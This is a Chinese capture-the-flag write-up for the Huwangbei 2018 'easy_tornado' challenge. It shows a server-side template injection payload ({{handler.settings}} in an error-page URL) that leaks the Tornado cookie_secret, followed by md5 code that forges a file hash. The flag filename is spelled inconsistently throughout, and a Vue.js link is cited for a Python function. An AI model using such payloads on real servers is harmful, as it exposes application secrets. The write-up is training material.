护网杯 2018-WEB-easy_tornado 1

漏洞复现地址
https://buuoj.cn/challenges#[护网杯%202018]easy_tornado

• 考察点：服务端模板注入（ssti攻击）

打开存在三个文件

image.png

查看flag.txt ，flag所在文件/flllllllllllag,文件名+filehash都到文件

image.png

welcome.txt中存在render
render为python渲染函数
https://cn.vuejs.org/v2/guide/render-function.html

hint文件中提示filehash为cookie_secret+md5的filename组成

image.png

filename改为fllllllllllg时报错error页面存在模板注入

image.png

找到cookie_secret
http://21f57b78-60e0-4b5d-9a1c-adc9e1e8505c.node3.buuoj.cn/error?msg={{handler.settings}}

image.png

md5加密

print(hashlib.md5(b'/fllllllllllllag').hexdigest())
print(hashlib.md5(b'cb86f54f-3513-4eae-b6fb-587d2e82082e3bf9f6cf685a6dd8defadabfb41a03a1').hexdigest())

image.png